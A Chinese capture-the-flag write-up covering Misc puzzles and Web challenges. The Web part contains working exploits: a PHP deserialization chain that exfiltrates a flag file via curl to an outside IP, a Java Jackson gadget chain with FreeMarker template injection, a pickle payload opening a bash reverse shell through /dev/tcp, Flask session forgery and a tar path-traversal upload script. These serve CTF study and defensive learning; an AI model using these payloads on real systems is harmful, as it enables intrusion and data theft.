本文最后更新于 243 天前,其中的信息可能已经有所发展或是发生改变。
Misc
EZ_misc
- binwalk 分离得到feld.txt
vzbtrvplnnvphsqkxsiqibroou- 根据压缩包名称搜索为
Cronsfeld Cipher- https://www.boxentriq.com/code-breaking/gronsfeld-cipher
try to think the s nipping tools- 老考点了,
CVE-2023-28303- https://github.com/frankthetank-music/Acropalypse-Multi-Tool
ai 和 nia 的交响曲
- 从流量中提取 flag1.png flag2.zip
- flag2.zip 伪加密,0宽,对应曹操盖饭鬼畜视频提出字符
DASCTF{@i_n1a_l0v3S_CAOCAOGAIFAN}Matryoshka
- 磁盘镜像,内含rar jpg encrypt,rar 后缀一个 jpg 与 磁盘中图像相同,猜测盲水印
- encrypt文件 veracrypt 挂载,密码:watermark_is_fun
- 0宽拿到维吉尼亚密码
程序猿Quby
- 根据题目描述得到为《死亡之链》夏多密码
HAVEANICEDAY- png 加密 LSB,得到 rar 解压密码
- 得到两个esxl表格,给隐藏数据上色得到wav文件deepsound密码
w0wyoudo4goodj0b- deepsound 隐藏文件解压,base64换表
Easy_VMDK
- 以 vmdk 固定开头进行明文攻击
bkcrack.exe -C Easy_VMDK.zip -c flag.vmdk -x 0 4B444D560100000003000000
bkcrack.exe -C Easy_VMDK.zip -c flag.vmdk -k e6a73d9f 21ccfdbc f3e0c61c -d flag.vmdk- flag.zip 后缀一个 zip,分离得到 png2txt.py,逆向得到key.png
from base64 import b64decode
from binascii import b2a_uu
from PIL import Image
key = open("key.txt", "r").read().split("\n")
key = [[int(_) for _ in b2a_uu(b64decode(i)).decode().strip().split(', ')] for i in key[:-1]]
file = Image.new("RGB", (2494, 137))
a = 0
for i in range(137):
for j in range(2494):
file.putpixel((j, i), tuple(key[a]))
a += 1
file.save("test.png")
DASCTF{2431a606-00a3-4698-8b0f-eb806a7bb1be}GIFuck
- 分离gif,通过hash提取字符
import os
import hashlib
dir_list = os.listdir('1')
result = []
for i in dir_list:
m = hashlib.md5()
fp = open('1\\' + i, 'rb')
data = fp.read()
m.update(data)
result.append(m.hexdigest())
flag = ''
sub = 0
for i in result:
if i == 'a6680292f0fc8a9796121447574de6ec':
flag += '+'
elif i == '04b5ae733105563b238777baff564e17':
flag += '['
elif i == 'f041b11363a41c0c7e1b755e45d908a3':
flag += '-'
elif i == '7514082f25355bc663e015e6d51763af':
flag += '>'
elif i == '06df41b1b5eea0485269b7178093d1ff':
flag += '<'
elif i == 'd4884cc21151c6e90acc351bf371935b':
flag += ']'
elif i == 'a53ffccc32e0aab29201cc8984fa9c7b':
flag += '.'
else:
print(i)
print(sub)
break
sub += 1
print(flag)++++[->++++<]>[->++++++<]>-[->+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]+++<++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]++<+++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]<+++[->++++<]>[->-<]>[-<<<+>>>]<+++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]+++<++[->++++<]>[->-<]>[-<<<+>>>]+<++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]<+++<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+++<+++[->++++<]>[->-<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>]+++<+++[->++++<]>[->+<]>[-<<<+>>>][->+<]>[-<<<+>>>]+++<+++[->++++<]>[->-<]>[-<<<+>>>]++<++[->++++<]>[->+<]>[-<<<+>>>]+++<+++[->++++<]>[->+<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>]++[->+<]>[-<<<+>>>]+<<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+<<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+<+++[->++++<]>[->+<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>][->+<]>[-<<<+>>>]++<+++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]+<<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+<<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+<+++[->++++<]>[->+<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>][->+<]>[-<<<+>>>]+++<+++[->++++<]>[->-<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>]+++<+++[->++++<]>[->+<]>[-<<<+>>>]++<+++<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]<<+++++++++[->+++++++++<]>++.<+++++[->+++++<]>+++.+++..+++++++.<+++++++++[->---------<]>--------.<++++++++[->++++++++<]>++.<++++[->++++<]>+++.-.<+++++++++[->---------<]>---.<+++++++++[->+++++++++<]>++++++++.<+++[->---<]>-.++++++.---.<+++++++++[->---------<]>-.<++++++++[->++++++++<]>++++++.++++++.<+++[->---<]>--.++++++.<++++++++[->--------<]>-------.<++++++++[->++++++++<]>+++++++++.<+++[->+++<]>+.<+++++++++[->---------<]>--.<++++++++[->++++++++<]>++++++++++++++.+.+++++.<+++++++++[->---------<]>---.<++++++++[->++++++++<]>++++++++.---.<+++[->+++<]>++++.<+++[->---<]>----.<+++++++[->-------<]>------.[-]<- 解密无用
但是看到这串brainfuck输出用的“.”都在末尾,猜测要么是栈里生成了flag值,没有输出,在后面的栈里输出了这个内容,或者是先生成了flag,没有输出,然后把flag的内容改掉了,改成了这个内容。但是看到编码的后半部分有大量的“-”,所以猜测是第二种,应该把flag值改掉了
from cjj✌
CONST_INF = int(1e7+7)
class Table:
def __init__(self):
self.register = [0, 0]
self.ptr = 0
def table_expand(self):
if self.ptr == 0:
self.ptr += len(self.register)
self.register = [0] * len(self.register) + self.register
elif self.ptr == len(self.register) - 1:
self.register = self.register + [0] * len(self.register)
else:
pass
def valid_check(self):
assert self.ptr >= 0 and self.ptr < len(self.register)
def ptr_l(self):
self.table_expand()
self.ptr -= 1
self.valid_check()
def ptr_r(self):
self.table_expand()
self.ptr += 1
self.valid_check()
def add1(self):
self.valid_check()
self.register[self.ptr] += 1
def sub1(self):
self.valid_check()
self.register[self.ptr] -= 1
def set(self, value):
self.valid_check()
self.register[self.ptr] = value
def get(self):
self.valid_check()
return self.register[self.ptr]
class Env:
def __init__(self):
self.table = Table()
def process(self, code, inp):
num_ins, ptr_ins = 0, 0
ptr_inp = 0
outp = ""
text = ""
while ptr_ins < len(code):
if code[ptr_ins] == '>':
#print(chr(self.table.get()),end="")
text += chr(self.table.get())
self.table.ptr_l()
num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
elif code[ptr_ins] == '<':
self.table.ptr_r()
num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
elif code[ptr_ins] == '+':
self.table.add1()
num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
elif code[ptr_ins] == '-':
self.table.sub1()
num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
elif code[ptr_ins] == '.':
outp += chr(self.table.get())
num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
elif code[ptr_ins] == ',':
if ptr_inp < len(inp):
self.table.set(ord(inp[ptr_inp]))
ptr_inp += 1
else:
raise ValueError('Input exhausted')
num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
elif code[ptr_ins] == '[':
if self.table.get() == 0:
while ptr_ins < len(code) and code[ptr_ins] != ']':
num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
elif code[ptr_ins] == ']':
if self.table.get() != 0:
while ptr_ins >= 0 and code[ptr_ins] != '[':
num_ins, ptr_ins = num_ins + 1, ptr_ins - 1
num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
else:
num_ins, ptr_ins = num_ins + 1, ptr_ins + 1
assert num_ins < CONST_INF
return outp,text
if __name__ == '__main__':
interpreter = Env()
# hello world
hello_world_code = '++++[->++++<]>[->++++++<]>-[->+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+>+<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<]+++<++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]++<+++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]<+++[->++++<]>[->-<]>[-<<<+>>>]<+++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]+++<++[->++++<]>[->-<]>[-<<<+>>>]+<++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]<+++<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+++<+++[->++++<]>[->-<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>]+++<+++[->++++<]>[->+<]>[-<<<+>>>][->+<]>[-<<<+>>>]+++<+++[->++++<]>[->-<]>[-<<<+>>>]++<++[->++++<]>[->+<]>[-<<<+>>>]+++<+++[->++++<]>[->+<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>]++[->+<]>[-<<<+>>>]+<<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+<<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+<+++[->++++<]>[->+<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>][->+<]>[-<<<+>>>]++<+++<+[->++++<]>[->++++<]>[->-<]>[-<<<+>>>]+<<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+<<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]+<+++[->++++<]>[->+<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>][->+<]>[-<<<+>>>]+++<+++[->++++<]>[->-<]>[-<<<+>>>]++<+[->++++<]>[->+<]>[-<<<+>>>]+++<+++[->++++<]>[->+<]>[-<<<+>>>]++<+++<+[->++++<]>[->++++<]>[->+<]>[-<<<+>>>]<<+++++++++[->+++++++++<]>++.<+++++[->+++++<]>+++.+++..+++++++.<+++++++++[->---------<]>--------.<++++++++[->++++++++<]>++.<++++[->++++<]>+++.-.<+++++++++[->---------<]>---.<+++++++++[->+++++++++<]>++++++++.<+++[->---<]>-.++++++.---.<+++++++++[->---------<]>-.<++++++++[->++++++++<]>++++++.++++++.<+++[->---<]>--.++++++.<++++++++[->--------<]>-------.<++++++++[->++++++++<]>+++++++++.<+++[->+++<]>+.<+++++++++[->---------<]>--.<++++++++[->++++++++<]>++++++++++++++.+.+++++.<+++++++++[->---------<]>---.<++++++++[->++++++++<]>++++++++.---.<+++[->+++<]>++++.<+++[->---<]>----.<+++++++[->-------<]>------.[-]<'
outp,text = interpreter.process(hello_world_code, None)
print(outp)
for i in text.encode().split(b" "):
data = ""
for j in i:
if(j > 32 and j < 127):
data += chr(j)
if(len(data) > 0):
print(data[-1],end="")
#Sorry but your flag is not here.
#?>_DASCTF{Pen_Pineapple_Apple_Pen}- 推荐:https://pablojorge.github.io/brainfuck,查看内存的值
Web
D0n’t pl4y g4m3!!!
- hint.txt
Ö_0 0vO Ow0 0w0 Ö_0 Ö_O Ö.O o_o 0.O OvO o.0 owo o.Ö Ö.Ö Ovo 0_Ö Ö_o owO O.0 owo Ö_o owO O.0 owo Ö_0 0wÖ O.0 0w0 Ö_0 OwO ov0 owo o_O O.Ö Övo - CTF 玩烂梗的题是真多,恶心
- p0p.php
<?php
header("HTTP/1.1 302 found");
header("Location:https://passer-by.com/pacman/");
class Pro{
private $exp;
private $rce2;
public function __get($name)
{
return $this->$rce2=$this->exp[$rce2];
}
public function __toString()
{
call_user_func('system', "cat /flag");
}
}
class Yang
{
public function __call($name, $ary)
{
if ($this->key === true || $this->finish1->name) {
if ($this->finish->finish) {
call_user_func($this->now[$name], $ary[0]);
}
}
}
public function ycb()
{
$this->now = 0;
return $this->finish->finish;
}
public function __wakeup()
{
$this->key = True;
}
}
class Cheng
{
private $finish;
public $name;
public function __get($value)
{
return $this->$value = $this->name[$value];
}
}
class Bei
{
public function __destruct()
{
if ($this->CTF->ycb()) {
$this->fine->YCB1($this->rce, $this->rce1);
}
}
public function __wakeup()
{
$this->key = false;
}
}
function prohib($a){
$filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i";
return preg_replace($filter,'',$a);
}
$a = $_POST["CTF"];
if (isset($a)){
unserialize(prohib($a));
}
?>- exp
From 0RAYS
<?php
class Yang
{
public function __call($name, $ary)
{
if ($this->key === true || $this->finish1->name) {
if ($this->finish->finish) {
call_user_func($this->now[$name], $ary[0]);
}
}
}
public function ycb()
{
$this->now = 0;
return $this->finish->finish;
}
public function __wakeup()
{
$this->key = True;
}
}
class Cheng
{
private $finish;
public $name;
public function __construct()
{
$this->name['finish']="system";
}
public function __get($value)
{
return $this->$value = $this->name[$value];
}
}
class Bei
{
public function __destruct()
{
if ($this->CTF->ycb()) {
$this->fine->YCB1($this->rce, $this->rce1);
}
}
public function __wakeup()
{
$this->key = false;
}
}
function prohib($a){
$filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i";
return preg_replace($filter,'',$a);
}
$test=new Bei();
$test->rce="curl http://124.223.14.29:11037/`cat /tmp/catcatf1ag.txt`";
$test->CTF=new Yang();
$test->CTF->finish=new Cheng();
$test->fine=new Yang();
$test->fine->finish=new Cheng();
$test->fine->now['YCB1']="system";
$test->fine->key=true;
echo urlencode(str_replace("s:6:\"system\";","s:6:\"syssystemtem\";",serialize($test)))- 双写绕的时候注意序列化字符串的长度是有变化的,手动改一下
Ez_java
- ban 了类
- 分析
然后他又只有springboot,也就是只有jackson的依赖能打,但能直接打的链子ban了。
有关jackson的反序列化网上都能搜到,源自阿里云CTF bypassit那题
jackson这玩意和fastjson一样,也是可以触发任意getter的
所以用jackson链子前半段,toString触发调
HtmlBean的getHtmlMap,然后动态代理调get方法写模板文件覆盖index.ftl 来RCE然后这里有关动态代理的相关参考CC1那个动态代理就好。就是要触发 HtmlMap 的get方法,但反序列化的时候又没有直接调用,所以利用动态代理,这里执行了get方法
所以利用jackson的链子触发getter方法
调用 put ,进入动态代理的invoke方法执行get写入文件
from 0RAYS-Pankas
- 调用栈
uploadfile:9, HtmlUploadUtil (com.ycbjava.Utils)
get:39, HtmlMap (com.ycbjava.Utils)
invoke:20, HtmlInvocationHandler (com.ycbjava.Utils)
isEmpty:-1, $Proxy63 (com.sun.proxy)
serializeWithoutTypeInfo:752, MapSerializer (com.fasterxml.jackson.databind.ser.std)
serialize:720, MapSerializer (com.fasterxml.jackson.databind.ser.std)
serialize:35, MapSerializer (com.fasterxml.jackson.databind.ser.std)
serializeAsField:728, BeanPropertyWriter (com.fasterxml.jackson.databind.ser)
serializeFields:774, BeanSerializerBase (com.fasterxml.jackson.databind.ser.std)
serialize:178, BeanSerializer (com.fasterxml.jackson.databind.ser)
defaultSerializeValue:1142, SerializerProvider (com.fasterxml.jackson.databind)
serialize:115, POJONode (com.fasterxml.jackson.databind.node)
serialize:39, SerializableSerializer (com.fasterxml.jackson.databind.ser.std)
serialize:20, SerializableSerializer (com.fasterxml.jackson.databind.ser.std)
_serialize:480, DefaultSerializerProvider (com.fasterxml.jackson.databind.ser)
serializeValue:319, DefaultSerializerProvider (com.fasterxml.jackson.databind.ser)
serialize:1518, ObjectWriter$Prefetch (com.fasterxml.jackson.databind)
_writeValueAndClose:1219, ObjectWriter (com.fasterxml.jackson.databind)
writeValueAsString:1086, ObjectWriter (com.fasterxml.jackson.databind)
nodeToString:30, InternalNodeMapper (com.fasterxml.jackson.databind.node)
toString:62, BaseJsonNode (com.fasterxml.jackson.databind.node)
readObject:86, BadAttributeValueExpException (javax.management)- exp
import com.fasterxml.jackson.databind.node.POJONode;
import com.fasterxml.jackson.databind.node.BaseJsonNode;
import com.ycbjava.Bean.HtmlBean;
import com.ycbjava.Utils.HtmlInvocationHandler;
import com.ycbjava.Utils.HtmlMap;
import javassist.*;
import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Proxy;
import java.util.Base64;
import java.util.Map;
public class Poc {
public static void main(String[] args) throws Exception {
// ClassPool pool = ClassPool.getDefault();
// //移除 BaseJsonNode 中的 writeReplace 方法
// CtClass ctClass0 = pool.get("com.fasterxml.jackson.databind.node.BaseJsonNode");
// CtMethod writeReplace = ctClass0.getDeclaredMethod("writeReplace");
// ctClass0.removeMethod(writeReplace);
// // 将修改后的CtClass加载至当前线程的上下文类加载器中
// ctClass0.toClass();
HtmlMap htmlMap = new HtmlMap();
String filname = "index.ftl";
String content = "<#assign ac=springMacroRequestContext.webApplicationContext>\n" +
" <#assign fc=ac.getBean('freeMarkerConfiguration')>\n" +
" <#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()>\n" +
" <#assign VOID=fc.setNewBuiltinClassResolver(dcr)>${\"freemarker.template.utility.Execute\"?new()(\"cat /flag\")}";
setFieldValue(htmlMap, "filename", filname);
setFieldValue(htmlMap, "content", content);
HtmlInvocationHandler htmlInvocationHandler = new HtmlInvocationHandler(htmlMap);
Map map = (Map) Proxy.newProxyInstance(
HtmlMap.class.getClassLoader(),
new Class[] {Map.class},
htmlInvocationHandler);
HtmlBean htmlBean = new HtmlBean();
setFieldValue(htmlBean, "HtmlMap", map);
POJONode jsonNodes = new POJONode(htmlBean);
BadAttributeValueExpException exp = new BadAttributeValueExpException(null);
Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
val.setAccessible(true);
val.set(exp,jsonNodes);
ByteArrayOutputStream barr = new ByteArrayOutputStream();
ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);
objectOutputStream.writeObject(exp);
objectOutputStream.close();
String res = Base64.getEncoder().encodeToString(barr.toByteArray());
System.out.println(res);
}
private static void setFieldValue(Object obj, String field, Object arg) throws Exception{
Field f = obj.getClass().getDeclaredField(field);
f.setAccessible(true);
f.set(obj, arg);
}
}- freemarker 模板注入
- https://www.cnblogs.com/escape-w/p/17326592.html
Ez_web
- cmd.php 执行部分命令,upload.php 上传文件,list.php 列出部分指定目录
猜测文件上传至 /etc/ 目录,因为没法列出
不知道哪队师傅的wp
- fuzz 之后发现可以上传 so 文件,上传 whoami.so 劫持反弹shell
Serpent
- app.py
from flask import Flask, session
from secret import secret
@app.route('/verification')
def verification():
try:
attribute = session.get('Attribute')
if not isinstance(attribute, dict):
raise Exception
except Exception:
return 'Hacker!!!'
if attribute.get('name') == 'admin':
if attribute.get('admin') == 1:
return secret
else:
return "Don't play tricks on me"
else:
return "You are a perfect stranger to me"
if __name__ == '__main__':
app.run('0.0.0.0', port=80)
- session 头部解密
python .\flask_session_cookie_manager3.py encode -s "GWHTpkwrEETkPT" -t "{'Attribute': {'admin': 1, 'name': 'admin', 'secret_key': 'GWHTpkwrEETkPT'}}"- 伪造 admin
Hello admin, welcome to /ppppppppppick1e@app.route('/src0de')
def src0de():
f = open(__file__, 'r')
rsp = f.read()
f.close()
return rsp[rsp.index("@app.route('/src0de')"):]
@app.route('/ppppppppppick1e')
def ppppppppppick1e():
try:
username = "admin"
rsp = make_response("Hello, %s " % username)
rsp.headers['hint'] = "Source in /src0de"
pick1e = request.cookies.get('pick1e')
if pick1e is not None:
pick1e = base64.b64decode(pick1e)
else:
return rsp
if check(pick1e):
pick1e = pickle.loads(pick1e)
return "Go for it!!!"
else:
return "No Way!!!"
except Exception as e:
error_message = str(e)
return error_message
return rsp
class GWHT():
def __init__(self):
pass
if __name__ == '__main__':
app.run('0.0.0.0', port=80)- R 过滤绕过
- https://xz.aliyun.com/t/11807#toc-4
- Pickle 反序列化
- https://goodapple.top/archives/1069
# From gtg
b'''(c__main__
GWHT
o}(S"__setstate__"
cos
system
ubS"bash -c 'bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/xxxx 0>&1'"
b.'''- python 提权
ArkNights
- 非预期,直接读
/proc/1/environ
ezyaml
- 上传 tarfile 覆盖 templates/result.html
- cve-2016-6321
import tarfile
import requests
url = ""
proxy = {"http": "http://127.0.0.1:8080", "https": "https://127.0.0.1:8080"}
def changeName(tarinfo):
# 修改tar包内文件名
tarinfo.name = f"../../templates/result.html"
return tarinfo
# 生成tar包
def generateTarFile(filename):
with tarfile.open("poc.tar", "w") as tar:
tar.add(filename, filter=changeName)
def upload():
file = {"file": open("poc.tar", "rb")}
res = requests.post(url + "/upload", files=file, proxies=proxy)
print(res.text)
if __name__ == "__main__":
requests.get(url)
generateTarFile("poc.html")
upload()
